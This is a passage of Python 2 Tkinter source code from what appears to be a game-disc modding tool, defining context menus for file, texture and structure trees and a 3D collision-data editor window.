			for iid in self.iidSelectionsTuple:
				if Gui.isoFileTree.item( iid, 'values' )[1] != 'file': break
			else: # The loop above didn't break; only files here
				self.add_separator()
				self.add_command( label='Copy Offsets to Clipboard', underline=2, command=self.copyFileOffsetToClipboard ) # P

		# Add an option for CSP Trim Colors, if it's appropriate
		if self.iidSelectionsTuple and self.orig20xxVersion:
			if 'BETA' in self.orig20xxVersion:
				majorBuildNumber = int( self.orig20xxVersion[-1] )
			else: majorBuildNumber = int( self.orig20xxVersion[0] )

			# Check if any of the selected files are an appropriate character alt costume file
			for iid in self.iidSelectionsTuple:
				filename = os.path.basename( iid )
				thisEntity = Gui.isoFileTree.item( iid, 'values' )[1] # Will be a string of 'file' or 'folder'

				if thisEntity == 'file' and candidateForTrimColorUpdate( filename, self.orig20xxVersion, majorBuildNumber ):
					if not lastSeperatorAdded:
						self.add_separator()
						lastSeperatorAdded = True
					self.add_command( label='Generate CSP Trim Colors', underline=0, command=self.prepareForTrimColorGeneration ) # G
					break

		if self.entity == 'file' and self.filename.startswith( 'pl' ):
			if not lastSeperatorAdded:
				self.add_separator()
				lastSeperatorAdded = True
			self.add_command( label='Set as CCC Source File', underline=11, command=lambda: self.cccSelectFromDisc( 'source' ) )	# S
			self.add_command( label='Set as CCC Destination File', underline=11, command=lambda: self.cccSelectFromDisc( 'dest' ) )	# D

	def prepareForTrimColorGeneration( self ):
		""" One of the primary methods for generating CSP Trim Colors.
			If only one file is being operated on, the user will be given a prompt to make the final color selection.
			If multiple files are selected, the colors will be generated and selected autonomously, with no user prompts. """

		# Make sure that the disc file can still be located
		if not discDetected(): return

		if self.selectionCount == 1:
			generateTrimColors( self.iidSelectionsTuple[0] )

		else: # Filter the selected files and operate on all alt costume files only, in autonomous mode
			# Hoisted out of the loop below; this value is the same for every file
			if 'BETA' in self.orig20xxVersion: origMainBuildNumber = int( self.orig20xxVersion[-1] )
			else: origMainBuildNumber = int( self.orig20xxVersion[0] )

			for iid in self.iidSelectionsTuple:
				filename = os.path.basename( iid )
				thisEntity = Gui.isoFileTree.item( iid, 'values' )[1] # Will be a string of 'file' or 'folder'

				if thisEntity == 'file' and candidateForTrimColorUpdate( filename, self.orig20xxVersion, origMainBuildNumber ):
					generateTrimColors( iid, True ) # autonomousMode=True means it will not prompt the user to confirm its main color choices

	def cccSelectFromDisc( self, role ): # Select a file in a disc as input to the Character Color Converter
		""" Sets the selected disc file as the 'source' or 'dest' file for the Character Color Converter tab. """

		# Double-check that the disc file can still be located
		if not discDetected(): return

		# Disc verified; proceed
		datHex = getFileDataFromDiscTree( iid=self.iidSelectionsTuple[0] )

		if datHex:
			prepareColorConversion( self.iidSelectionsTuple[0], datHex, role )

			# Switch to the CCC tab if both source and destination files have been provided.
			if CCC['dataStorage']['sourceFile'] != '' and CCC['dataStorage']['destFile'] != '': Gui.mainTabFrame.select( Gui.cccTab )

	def copyFileOffsetToClipboard( self ):
		""" Copies the disc offset(s) of the selected file(s) to the clipboard, comma-separated. """

		Gui.isoFileTree.selection_set( self.iidSelectionsTuple ) 	# Highlights the item(s)
		Gui.isoFileTree.focus( self.iidSelectionsTuple[0] ) 		# Sets keyboard focus to the first item

		# Get the offsets of all of the items selected
		offsets = []
		for iid in self.iidSelectionsTuple:
			isoOffset = Gui.isoFileTree.item( iid, 'values' )[2]
			offsets.append( isoOffset )

		copyToClipboard( ', '.join(offsets) )

	def renameRandomNeutralStage( self ):
		""" Prompts for, validates, and writes a new nickname for a 20XX 'Random Neutral'
			stage. The name is written into both MnSlChr (CSS) file variants, and the
			Disc File Tree display is updated to show the new name. """

		# Get the full case-sensitive file name
		iidValues = Gui.isoFileTree.item( self.iidSelectionsTuple[0], 'values' )
		fullFileName = iidValues[4].split( '/' )[-1] # 5th item in iidValues is isoPath

		# Get the current name
		cssData0Iid = scanDiscForFile( 'MnSlChr.0' )
		cssData1Iid = scanDiscForFile( 'MnSlChr.1' )
		cssData0 = getFileDataFromDiscTreeAsBytes( iid=cssData0Iid )
		nameOffset = get20xxRandomNeutralNameOffset( fullFileName )[0]
		originalName = cssData0[nameOffset:nameOffset+0x20].split('\x00')[0].decode( 'ascii' )

		# Prompt the user to enter a new name, and validate it
		nameChecksOut = False
		while not nameChecksOut:
			popupWindow = PopupEntryWindow( Gui.root, message='Enter a new stage nickname:', defaultText=originalName, width=40 )
			newName = popupWindow.entryText.replace( '"', '' ).strip()
			if newName == '': break # User canceled or submitted an empty name

			# Validate the name length
			if len( newName ) > 31:
				msg( 'Please specify a name less than 31 characters in length.' )
				continue

			# Exclude some special characters
			for char in [ '\n', '\t' ]:
				if char in newName:
					msg( 'Line breaks or tab characters may not be included in the name.' )
					break
			else: # The above loop didn't break (meaning an invalid character wasn't found)
				# Convert the name to bytes and validate the length
				try:
					nameBytes = bytearray()
					nameBytes.extend( newName )
					if len( nameBytes ) <= 0x1F:
						# Add padding to make sure any old text is overwritten. Must end with at least one null byte
						nameBytes.extend( (0x20 - len(nameBytes)) * b'\00' )
						nameChecksOut = True
					else:
						msg( 'Unable to encode the new name into 31 bytes. Try shortening the name.' )
				except:
					msg( 'Unable to encode the new name into 31 bytes. There may be an invalid character.' )

		if not newName: # User canceled above name input window
			return

		# Write the new name's bytes into both CSS files at the appropriate location
		cssData1 = getFileDataFromDiscTreeAsBytes( iid=cssData1Iid )
		nameBytesLength = len( nameBytes )
		cssData0[nameOffset:nameOffset+nameBytesLength] = nameBytes
		cssData1[nameOffset:nameOffset+nameBytesLength] = nameBytes

		# Save the new CSS file data to disc ('ram' source + hexlified data marks it as modified-in-memory)
		_, _, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( cssData0Iid, 'values' )
		Gui.isoFileTree.item( cssData0Iid, values=('Stage name updated', 'file', isoOffset, fileSize, isoPath, 'ram', hexlify(cssData0)), tags='changed' )
		_, _, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( cssData1Iid, 'values' )
		Gui.isoFileTree.item( cssData1Iid, values=('Stage name updated', 'file', isoOffset, fileSize, isoPath, 'ram', hexlify(cssData1)), tags='changed' )

		# Update the name shown for the stage in question
		Gui.isoFileTree.item( self.iidSelectionsTuple[0], values=('     '+newName,)+iidValues[1:] ) # Extra spaces added to indent the name from the stage folder name

		# Remember these changes, and update the program status
		unsavedDiscChanges.append( 'Random Neutral stage name updated.' )
		updateProgramStatus( 'Stage Name Updated' )
class textureMenuOptions( Tk.Menu, object ):

	""" Context menu for the DAT Texture Tree tab. Rebuilt on every display so that the
		available options reflect the current texture selection. """

	def __init__( self, parent, tearoff=True, *args, **kwargs ):
		super( textureMenuOptions, self ).__init__( parent, tearoff=tearoff, *args, **kwargs )
		self.open = False

	def repopulate( self ):
		""" This method will be called every time the submenu is displayed. """

		# Clear all current population
		self.delete( 0, 'last' )
		self.lastItem = ''

		# Check if anything is currently selected
		self.iids = Gui.datTextureTree.selection() # Returns a tuple of iids, or an empty string if nothing is selected.
		self.selectionCount = len( self.iids )

		if self.iids: 																	# Keyboard shortcuts:
			self.lastItem = self.iids[-1] # Selects the lowest position item selected in the treeview.
			self.add_command( label='Export Selected Texture(s)', underline=0, command=exportTextures )			# E
			self.add_command( label='Export All', underline=7, command=self.exportAllTextures )				# A
			self.add_command( label='Import Texture(s)', underline=0, command=importImageFiles )				# I
			self.add_separator()
			self.add_command( label='Blank Texture (Zero-out)', underline=0, command=blankTextures )			# B
			#self.add_command(label='Disable (Prevents Rendering)', underline=0, command=disableTextures )
			if self.selectionCount > 1:
				self.add_command( label='Copy Offsets to Clipboard', underline=0, command=self.textureOffsetToClipboard )		# C
				self.add_command( label='Copy Dolphin Hashes to Clipboard', underline=13, command=self.dolphinHashToClipboard )	# H
			else:
				self.add_command( label='Show in Structural Analysis', underline=0, command=self.showTextureInStructAnalysisTab )	# S
				self.add_command( label='Copy Offset to Clipboard', underline=0, command=self.textureOffsetToClipboard )		# C
				self.add_command( label='Copy Dolphin Hash to Clipboard', underline=13, command=self.dolphinHashToClipboard )	# H
		else:
			self.add_command( label='Export All', underline=7, command=self.exportAllTextures )				# A

	def exportAllTextures( self ):
		""" Exports every texture currently listed in the DAT Texture Tree (after filters). """

		if len( Gui.datTextureTree.get_children() ) == 0:
			msg( 'You need to first open a file that you would like to export textures from.'
				 '\n\n(If you have loaded a file, either there were no textures found, or '
				 'you have texture filters blocking your results.)' )
		else:
			exportTextures( exportAll=True )

	def showTextureInStructAnalysisTab( self ):
		""" Locates the selected texture's structure and displays it on the Structural Analysis tab. """

		# Set the selected item in DAT Texture Tree, so that it's clear which image is being operated on
		Gui.datTextureTree.selection_set( self.lastItem )
		Gui.datTextureTree.focus( self.lastItem )

		# Make sure the current iid is the start of a structure (may not be in the case of particle effects).
		# Fix: the membership test previously compared the string iid (self.lastItem) against the
		# integer offsets in structureOffsets, so it could never match; compare the converted int.
		structOffset = int( self.lastItem )
		if structOffset not in globalDatFile.structureOffsets:
			structOffset = globalDatFile.getPointerOwner( structOffset, True )

		# Add the texture's data block instances to the tree and show them
		showStructInStructuralAnalysis( structOffset )

		# Switch to the SA tab
		Gui.mainTabFrame.select( Gui.savTab )

	def textureOffsetToClipboard( self ):
		""" Copies the file offset(s) of the selected texture(s) to the clipboard, comma-separated. """

		Gui.datTextureTree.selection_set( self.iids ) 	# Highlights the item(s)
		Gui.datTextureTree.focus( self.iids[0] ) 	# Sets keyboard focus to the first item

		# Get the offsets of all of the items selected
		offsets = []
		for iid in self.iids:
			imageDataDetails = Gui.datTextureTree.item( iid, 'values' )[0]
			offsets.append( imageDataDetails.split()[0] ) # First token of the details string is the offset

		copyToClipboard( ', '.join(offsets) )

	def dolphinHashToClipboard( self ):
		""" Copies Dolphin-convention texture filename hash(es) for the selection to the clipboard. """

		Gui.datTextureTree.selection_set( self.iids ) 	# Highlights the item(s)
		Gui.datTextureTree.focus( self.iids[0] ) 	# Sets keyboard focus to the first item

		# Get the hashes of all of the items selected
		hashedFileNames = []
		for iid in self.iids:
			hashedFileNames.append( constructTextureFilename( globalDatFile, iid, forceDolphinHash=True ) )

		copyToClipboard( ', '.join(hashedFileNames) )
class structureMenuOptions( Tk.Menu, object ):
def __init__( self, parent, tearoff=True, *args, **kwargs ):
super( structureMenuOptions, self ).__init__( parent, tearoff=tearoff, *args, **kwargs )
self.open = False
def repopulate( self ):
""" This method will be called every time the submenu is displayed. """
# Clear all current population
self.delete( 0, 'last' )
# Determine the kind of structure(s) we're working with, to determine menu options
self.iids = Gui.fileStructureTree.selection()
self.selectionCount = len( self.iids )
if self.selectionCount == 1: # Keyboard shortcuts:
itemName = Gui.fileStructureTree.item( self.iids[0], 'text' )
if itemName == 'coll_data':
#collDataOffset = int( self.iids[0].split('/')[-1] )
self.add_command( label='Render', underline=0, command=self.renderCollisions )
self.add_command( label='Copy Offset to Clipboard', underline=0, command=self.offsetToClipboard ) # C
# Check the kind of structure clicked on
structOffset = int( self.iids[0].split('/')[-1] )
structure = globalDatFile.getStruct( structOffset )
if structure.__class__ in ( hsdStructures.ImageObjDesc, hsdStructures.TextureObjDesc, hsdStructures.ImageDataBlock ):
self.add_command( label='Show in DAT Texture Tree', underline=0, command=self.showInDatTextureTree ) # S
# Check if the currently selected item is 'marked'
currentTags = Gui.fileStructureTree.item( self.iids[0], 'tags' )
if 'marked' in currentTags:
self.add_command( label='Unmark Selected Struct', underline=0, command=self.unmarkSelectedStructs ) # U
else:
self.add_command( label='Mark Selected Struct', underline=0, command=self.markSelectedStructs ) # M
self.add_separator()
elif self.selectionCount > 1:
self.add_command( label='Copy Offsets to Clipboard', underline=0, command=self.offsetToClipboard ) # C
# Check if there are more marked or unmarked items selected
markedItems = 0
unmarkedItems = 0
for iid in self.iids:
if 'marked' in Gui.fileStructureTree.item( iid, 'tags' ): markedItems += 1
else: unmarkedItems += 1
if markedItems >= unmarkedItems:
self.add_command( label='Unmark Selected Structs', underline=0, command=self.unmarkSelectedStructs ) # U
else:
self.add_command( label='Mark Selected Structs', underline=0, command=self.markSelectedStructs ) # M
self.add_separator()
self.add_command( label='Collapse Data Space', underline=1, command=self.collapseDataSpace ) # O
self.add_command( label='Extend Data Space', underline=0, command=self.extendDataSpace ) # E
def offsetToClipboard( self ):
Gui.fileStructureTree.selection_set( self.iids ) # Highlights the item(s)
Gui.fileStructureTree.focus( self.iids[0] ) # Sets keyboard focus to the first item
# Get the offsets of all of the items selected
offsets = []
for iid in self.iids:
offset = int( iid.split('/')[-1] )
offsets.append( uHex(0x20+offset) )
copyToClipboard( ', '.join(offsets) )
def showInDatTextureTree( self ):
# Check the kind of structure clicked on
structOffset = int( self.iids[0].split('/')[-1] )
structure = globalDatFile.getStruct( structOffset )
# Get the image data offset (whether from the TObj or another lower structure)
if structure.__class__ == hsdStructures.TextureObjDesc:
imageHeaderOffset = structure.getValues( 'Image_Header_Pointer' )
imageHeader = globalDatFile.getStruct( imageHeaderOffset )
imageDataOffset = imageHeader.getValues()[0]
elif structure.__class__ == hsdStructures.ImageObjDesc:
imageDataOffset = structure.getValues()[0]
else: # Should be an ImageDataBlock
imageDataOffset = structure.offset
targetIid = str( imageDataOffset )
# Make sure the DAT Texture Tree tab has been populated
if not Gui.datTextureTree.get_children() or not Gui.datTextureTree.exists( targetIid ):
clearDatTab()
scanDat( priorityTargets=(imageDataOffset,) )
# Look for this texture in the DAT Texture Tree tab
if Gui.datTextureTree.exists( targetIid ):
# Switch tabs, and select the target texture
Gui.mainTabFrame.select( Gui.datTab )
Gui.datTextureTree.selection_set( targetIid )
Gui.datTextureTree.see( targetIid )
else: # ¿Qué?
print 'Unable to find {} (0x{:X}) in the DAT Texture Tree tab.'.format( targetIid, 0x20+int(targetIid) )
msg( 'The image for ' + structure.name + ' could not\nbe found in the DAT Texture Tree tab!', '¿Qué?' )
def markSelectedStructs( self ):
# Add tags to the selected items
for iid in self.iids:
currentTags = Gui.fileStructureTree.item( iid, 'tags' )
if not currentTags:
Gui.fileStructureTree.item( iid, tags='marked' )
elif 'marked' not in currentTags:
currentTags.append( 'marked' )
Gui.fileStructureTree.item( iid, tags=currentTags )
def unmarkSelectedStructs( self ):
# Add tags to the selected items
for iid in self.iids:
try:
currentTags = list( Gui.fileStructureTree.item( iid, 'tags' ) )
currentTags.remove( 'marked' )
Gui.fileStructureTree.item( iid, tags=currentTags )
except Exception as e:
print "Unable to remove 'marked' selection status from", iid
print e
def collapseDataSpace( self ):
modifierWindow = DataSpaceModifierWindow( Gui.root, 'collapse' )
if modifierWindow.offset and modifierWindow.amount:
# Perform some basic validation and typcasting
try:
offset = int( modifierWindow.offset, 16 ) - 0x20
amount = int( modifierWindow.amount, 16 )
except Exception as err:
print err
msg( 'Invalid input values.' )
return
globalDatFile.collapseDataSpace( offset, amount )
# Need to reinitialize file structures
clearStructuralAnalysisTab()
analyzeDatStructure()
updateProgramStatus( 'File Data Collapsed' )
def extendDataSpace( self ):
modifierWindow = DataSpaceModifierWindow( Gui.root, 'extend' )
if modifierWindow.offset and modifierWindow.amount:
# Perform some basic validation and typcasting
try:
offset = int( modifierWindow.offset, 16 ) - 0x20
amount = int( modifierWindow.amount, 16 )
except Exception as err:
print err
msg( 'Invalid input values.' )
return
globalDatFile.extendDataSpace( offset, amount )
# Need to reinitialize file structures
clearStructuralAnalysisTab()
analyzeDatStructure()
updateProgramStatus( 'File Data Extended' )
def renderCollisions( self ):
CollisionsEditor( int(self.iids[0].split('/')[-1]) )
class CollisionsEditor( basicWindow ):

	""" Window that renders a stage's collision data (spots, links, and areas) on a 3D canvas,
		alongside tabbed panels for inspecting the underlying structure values. The collision
		links are 2D line segments in the file; they are extruded along Z into thin 3D faces
		so they render as surfaces. """

	def __init__( self, collStructOffset ):
		# collStructOffset: offset (relative to the 0x20 file header) of the coll_data struct
		basicWindow.__init__( self, Gui.root, 'Collision Data for ' + globalDatFile.fileName, offsets=(0, 30), topMost=False, resizable=True, minsize=(600, 350) )

		self.highlightedLabels = []		# Label widgets currently tinted by hover-highlighting
		self.highlightedId = None		# Canvas item id of the currently highlighted surface

		# Get the structures defining the stage's spot, links, and areas (they should already be initialized)
		self.collStruct = globalDatFile.structs[ collStructOffset ]
		spotTableOffset, linkTableOffset, areaTableOffset = self.collStruct.getChildren()
		self.spotTable = globalDatFile.structs[ spotTableOffset ]
		self.linkTable = globalDatFile.structs[ linkTableOffset ]
		self.areaTable = globalDatFile.structs[ areaTableOffset ]
		self.vertices = self.spotTable.getVertices()
		self.collisionLinks = self.linkTable.getFaces()
		self.areas = self.areaTable.getAreas()

		# Visibility toggles, controlled from the Rendering tab
		self.showAreas = Tk.BooleanVar( value=False )
		self.showBasicLinks = Tk.BooleanVar( value=True )
		# self.showPreLinks = Tk.BooleanVar( value=False )
		# self.showPostLinks = Tk.BooleanVar( value=False )

		# Get reference counts for spots (how many links reference each spot index), and set render status
		spotRefCounts = {}
		for link in self.collisionLinks:
			for index in link.allSpotIndices:
				if index == -1: continue
				elif index in spotRefCounts:
					spotRefCounts[index] += 1
				else:
					spotRefCounts[index] = 1

			# if link.type == 'pre': link.render = self.showPreLinks.get()
			# elif link.type == 'post': link.render = self.showPostLinks.get()
			# else:
			link.render = self.showBasicLinks.get() # Basic links

		# Convert the 2D collision lines to 3D collision surfaces
		self.extrudeCollisionLinks()

		# Create vertices from the areas, and add them to the vertices list (replacing orig values with indices in collision object)
		self.areaVertices = []
		areaVerticesIndex = len( self.vertices ) + len( self.collVertices )
		for i, area in enumerate( self.areas, start=1 ):
			area.number = i
			# area.points initially holds raw coordinates; preserved in origPoints before
			# being replaced with four indices into the combined vertices list below
			area.origPoints = botLeftX, botLeftY, topRightX, topRightY = area.points
			self.areaVertices.append( RenderEngine.Vertex(( botLeftX, botLeftY, 0 )) )
			self.areaVertices.append( RenderEngine.Vertex(( botLeftX, topRightY, 0 )) )
			self.areaVertices.append( RenderEngine.Vertex(( topRightX, topRightY, 0 )) )
			self.areaVertices.append( RenderEngine.Vertex(( topRightX, botLeftY, 0 )) )
			area.points = ( areaVerticesIndex, areaVerticesIndex+1, areaVerticesIndex+2, areaVerticesIndex+3 )
			area.render = self.showAreas.get()
			areaVerticesIndex += 4

		#vertices = [[-1,-1,-1],[-1,-1,1],[-1,1,1],[-1,1,-1],[1,-1,-1],[1,-1,1],[1,1,1],[1,1,-1]] # cube points
		#collisionLinks = [[0,1,2],[0,2,3],[2,3,7],[2,7,6],[1,2,5],[2,5,6],[0,1,4],[1,4,5],[4,5,6],[4,6,7],[3,7,4],[4,3,0]] # cube point indices
		#collisionLinks = [ (0,3), (3,7), (7,4), (4,0) ] # one cube face (lines)
		#vertices.extend( [[-1,-1,-1], [-1,1,-1], [1,1,-1], [1,-1,-1]] )
		# vertices.extend( [[-10,-10,-10], [-10,10,-10], [10,10,-10], [10,-10,-10]] )
		# collisionLinks.extend( [ (-4,-3), (-3,-2), (-2,-1), (-1,-4) ] )

		# Build the 3D render canvas from the combined vertex pool and drawable shapes
		allVertices = self.vertices + self.collVertices + self.areaVertices
		self.renderPlane = RenderEngine.Engine3D( self.mainFrame, allVertices, self.collisionLinks + self.areas, width=800, height=600, background='black' )
		self.renderPlane.grid( column=0, row=0, sticky='nsew' )
		self.renderPlane.focus_set()

		# Bind event handlers (note: 'CollissionSurface' spelling must match the tag used by the render engine)
		self.renderPlane.tag_bind( 'CollissionSurface', '<Enter>', self.collSurfaceHovered )
		self.renderPlane.tag_bind( 'CollissionSurface', '<Leave>', self.linkTabLinkUnhovered )
		# self.renderPlane.tag_bind( 'ColCalcArea', '<Enter>', self.areaHovered )
		# self.renderPlane.tag_bind( 'ColCalcArea', '<Leave>', self.areaUnhovered )

		# Build out the panels on the right-hand side
		self.structuresPanel = ttk.Notebook( self.mainFrame )
		self.populateSpotsTab( spotRefCounts )
		self.linksTab = ttk.Frame( self.structuresPanel )
		self.structuresPanel.add( self.linksTab, text=' Links ' )
		self.linksInnerFrame = VerticalScrolledFrame( self.linksTab )
		self.populateLinksTab()
		self.populateAreasTab()
		self.populateRenderingTab()
		self.structuresPanel.grid( column=1, row=0, sticky='nsew' )

		# Enable resizing of the grid cells (canvas gets 3x the stretch of the side panel)
		self.mainFrame.grid_columnconfigure( 0, weight=3 )
		self.mainFrame.grid_columnconfigure( 1, weight=1, minsize=250 )
		self.mainFrame.grid_rowconfigure( 0, weight=1 )

	def extrudeCollisionLinks( self ):
		""" Extrudes each collision link (which are initially 2D lines), turning them into 3D faces.
			Each link's two endpoints are duplicated at +/- collFaceThickness on the Z axis, producing
			a 4-point face. New vertices are de-duplicated so links sharing a spot share vertices.
			Links with out-of-range spot indices are flagged (validIndices=False) and left unextruded. """
		self.collVertices = []
		collFaceThickness = 7
		origVerticesLength = len( self.vertices )

		for link in self.collisionLinks:
			# Perform some validation
			link.validIndices = True
			if link.points[0] < 0 or link.points[0] >= origVerticesLength: link.validIndices = False
			if link.points[1] < 0 or link.points[1] >= origVerticesLength: link.validIndices = False
			for pointIndex in link.allSpotIndices[2:]:
				if pointIndex < -1 or pointIndex >= origVerticesLength:
					print 'link', link.index, 'refereneces a non-existant point (index', str(pointIndex) + ')'
					break
			# Keep the original 2-point form before replacing it with the 4-point face below
			link.origPoints = link.points
			if not link.validIndices: continue

			# Create two new vertices for spot 1
			originalVertex = self.vertices[ link.points[0] ]
			newCoords = ( originalVertex.x, originalVertex.y, collFaceThickness )
			if newCoords not in self.collVertices:
				self.collVertices.append( newCoords )
			pointIndex1 = origVerticesLength + self.collVertices.index( newCoords )
			newCoords = ( originalVertex.x, originalVertex.y, -collFaceThickness )
			if newCoords not in self.collVertices:
				self.collVertices.append( newCoords )
			pointIndex2 = origVerticesLength + self.collVertices.index( newCoords )

			# Create two new vertices for spot 2
			originalVertex = self.vertices[ link.points[1] ]
			newCoords = ( originalVertex.x, originalVertex.y, collFaceThickness )
			if newCoords not in self.collVertices:
				self.collVertices.append( newCoords )
			pointIndex3 = origVerticesLength + self.collVertices.index( newCoords )
			newCoords = ( originalVertex.x, originalVertex.y, -collFaceThickness )
			if newCoords not in self.collVertices:
				self.collVertices.append( newCoords )
			pointIndex4 = origVerticesLength + self.collVertices.index( newCoords )

			# Save the new link indices (ordered to form a quad around the original line)
			link.points = ( pointIndex1, pointIndex3, pointIndex4, pointIndex2 )

		# Create new vertices for the new points, and store them with the rest of the vertices list
		# (done after the loop so the tuple membership tests above stay valid)
		for i, coords in enumerate( self.collVertices ):
			self.collVertices[i] = RenderEngine.Vertex( coords )

	def populateSpotsTab( self, spotRefCounts ):
		""" Builds the 'Spots' tab: one row per spot/vertex, showing its coords and how
			many links reference it. spotRefCounts maps spot index -> reference count. """
		self.spotsTab = ttk.Frame( self.structuresPanel )
		self.structuresPanel.add( self.spotsTab, text=' Spots ' )
		spotsInnerFrame = VerticalScrolledFrame( self.spotsTab )

		Tk.Label( spotsInnerFrame.interior, text='X/Y Coords:' ).grid( column=0, row=0, padx=50, sticky='w' )
		Tk.Label( spotsInnerFrame.interior, text='Reference Count:' ).grid( column=1, row=0, columnspan=2, sticky='e', padx=20 )

		spotOffset = 0x20 + self.spotTable.offset		# Each spot entry is 8 bytes
		row = 1
		for vertex in self.vertices:
			spotLabel = Tk.Label( spotsInnerFrame.interior, text='{}: ({}, {})'.format(row-1, vertex.x, vertex.y * -1) ) # Y values inverted
			spotLabel.grid( column=0, row=row, columnspan=2, padx=(15,0), sticky='w' )
			referenceCount = spotRefCounts.get( row-1, 0 )
			Tk.Label( spotsInnerFrame.interior, text=str( referenceCount ) ).grid( column=2, row=row, sticky='e', padx=(15,15) )
			ToolTip( spotLabel, 'File Offset: 0x{:X}'.format(spotOffset) )
			spotOffset += 8
			row += 1

		spotsInnerFrame.pack( fill='both', expand=True )

	def populateLinksTab( self ):
		""" Builds the 'Links' tab: one row per collision link, showing its two spot indices.
			Invalid (out-of-range) references are shown in red and not hover-bound. """
		origVerticesLength = len( self.vertices )

		Tk.Label( self.linksInnerFrame.interior, text='Spot 1 & 2 References:' ).grid( column=0, row=0, padx=50, sticky='w' )

		linkOffset = 0x20 + self.linkTable.offset		# Each link entry is 0x10 bytes
		row = 1
		for link in self.collisionLinks:
			#if not link.type == 'basic': continue # Skip pre/post/virtual links

			fontColor = 'black'
			if link.origPoints[0] < 0 or link.origPoints[0] >= origVerticesLength:
				pointText0 = 'Invalid'
				fontColor = 'red'
			else:
				pointText0 = link.origPoints[0]
			if link.origPoints[1] < 0 or link.origPoints[1] >= origVerticesLength:
				pointText1 = 'Invalid'
				fontColor = 'red'
			else:
				pointText1 = link.origPoints[1]

			# Add the label
			label = Tk.Label( self.linksInnerFrame.interior, text='{}, 0x{:X}: ({}, {})'.format(row, linkOffset, pointText0, pointText1), fg=fontColor )
			label.grid( column=0, row=row, ipadx=15, padx=15 )
			label.link = link		# Lets hover handlers map this widget back to its link object
			if fontColor != 'red':
				label.bind( '<Enter>', self.linkTabLinkHovered )
				label.bind( '<Leave>', self.linkTabLinkUnhovered )
			#ToolTip( label, 'File Offset: 0x{:X}'.format(linkOffset) )

			# Add delete button
			# deleteLabel = ttk.Button( self.linksInnerFrame.interior, text='Delete' )
			# deleteLabel.configure( command=lambda linkIndex=link.index: self.deleteLink(linkIndex) )
			# deleteLabel.grid( column=1, row=row, padx=15 )
			# deleteLabel.bind( '<Enter>', self.linkTabLinkHovered )
			# deleteLabel.bind( '<Leave>', self.linkTabLinkUnhovered )

			linkOffset += 0x10
			row += 1

		self.linksInnerFrame.pack( fill='both', expand=True )

	def populateAreasTab( self ):
		""" Builds the 'Areas' tab: three rows per area (header + two coordinate rows). """
		self.areasTab = ttk.Frame( self.structuresPanel )
		self.structuresPanel.add( self.areasTab, text=' Areas ' )
		areasInnerFrame = VerticalScrolledFrame( self.areasTab )

		areaOffset = 0x20 + self.areaTable.offset		# Each area entry is 0x28 bytes
		row = 1
		for area in self.areas:
			# Py2 integer division; row advances by 3 per area, so row/3+1 numbers the areas 1, 2, 3...
			areaHeader = Tk.Label( areasInnerFrame.interior, text='\tArea {}:'.format(row/3+1) )
			areaHeader.grid( column=0, row=row, padx=15, sticky='w' )
			Tk.Label( areasInnerFrame.interior, text='Bottom-left coords: ({}, {})'.format(area.origPoints[0], area.origPoints[1]) ).grid( column=0, row=row+1, padx=15, sticky='w' )
			Tk.Label( areasInnerFrame.interior, text='Top-Right coords: ({}, {})'.format(area.origPoints[2], area.origPoints[3]) ).grid( column=0, row=row+2, padx=15, sticky='w' )
			ToolTip( areaHeader, 'File Offset: 0x{:X}'.format(areaOffset) )
			areaOffset += 0x28
			row += 3

		areasInnerFrame.pack( fill='both', expand=True )

	def populateRenderingTab( self ): # i.e. Settings
		""" Builds the 'Rendering' tab, holding visibility toggles for areas and links. """
		self.renderingTab = ttk.Frame( self.structuresPanel )
		self.structuresPanel.add( self.renderingTab, text=' Rendering ' )

		ttk.Checkbutton( self.renderingTab, text='Show Areas', variable=self.showAreas, command=self.updateAreaVisibility ).pack( pady=(40, 10) )
		ttk.Checkbutton( self.renderingTab, text='Show Links', variable=self.showBasicLinks, command=self.toggleBasicLinkVisibility ).pack( pady=10 )
		# ttk.Checkbutton( self.renderingTab, text='Show Pre Links', variable=self.showPreLinks, command=self.togglePreLinkVisibility ).pack( pady=10 )
		# ttk.Checkbutton( self.renderingTab, text='Show Post Links', variable=self.showPostLinks, command=self.togglePostLinkVisibility ).pack( pady=10 )

	def linkTabLinkHovered( self, event ):
		""" Event handler for hovering over a link in the Links tab, which highlights the specific link in the canvas. """
		hoverColor = '#e0e0a0' # Light yellow

		if event.widget.winfo_class() == 'TButton':
			# Hovered a (currently commented-out) Delete button; find the Label gridded just before it
			lastWidget = None
			for widget in self.linksInnerFrame.interior.winfo_children():
				if widget == event.widget:
					labelWidget = lastWidget
					break
				lastWidget = widget
		else:
			labelWidget = event.widget

		# Change the background color of the highlighted widget
		labelWidget['bg'] = hoverColor
		self.highlightedLabels.append( labelWidget )

		# Change the background color of the face in the canvas
		collisionLink = labelWidget.link
		self.renderPlane.itemconfigure( collisionLink.id, fill=hoverColor, outline=hoverColor )
		self.highlightedId = collisionLink.id

	def linkTabLinkUnhovered( self, event ):
		""" Event handler for unhovering over a collision link in the canvas, or a link in the Links tab,
			which unhighlights the specific link in the canvas. """
		# Change the background color of the previously highlighted widget(s) back to normal
		while self.highlightedLabels:
			try: # These labels may no longer exist (if Delete button was used)
				self.highlightedLabels.pop()['bg'] = 'SystemButtonFace' # The default
			except: pass

		# # Change the background color of the face in the canvas (restore the link's own colors)
		if self.highlightedId:
			for link in self.collisionLinks:
				linkId = getattr( link, 'id', None )
				if not linkId: continue # Some links may not be rendered
				elif link.id == self.highlightedId:
					self.renderPlane.itemconfigure( self.highlightedId, fill=link.fill, outline=link.outline )
					self.highlightedId = None
					break

	def collSurfaceHovered( self, event ):
		""" Event handler for hovering over a link in the canvas, which highlights the specific link in the Links tab (if visible). """
		hoverColor = '#e0e0a0' # Light yellow

		currentTab = self.window.nametowidget( self.structuresPanel.select() )
		if currentTab not in ( self.spotsTab, self.linksTab ): return

		# Get the label widget and link object
		linkId = self.renderPlane.find_withtag( 'current' )[0]
		for widget in self.linksInnerFrame.interior.grid_slaves( column=0 ):
			# Get the link object; skipping those without it
			collisionLink = getattr( widget, 'link', None )
			if not collisionLink: continue
			elif collisionLink.id == linkId: break # Found it
		else: # Above loop didn't break; no matching collision link found
			return

		# Color the selected surface on the canvas
		linkId = self.renderPlane.find_withtag( 'current' )[0]
		self.renderPlane.itemconfig( linkId, fill=hoverColor, outline=hoverColor )
		self.highlightedId = linkId

		if currentTab == self.spotsTab:
			# Highlight the two spot labels this link references, and scroll them into view
			spotsInnerFrame = self.spotsTab.winfo_children()[0]
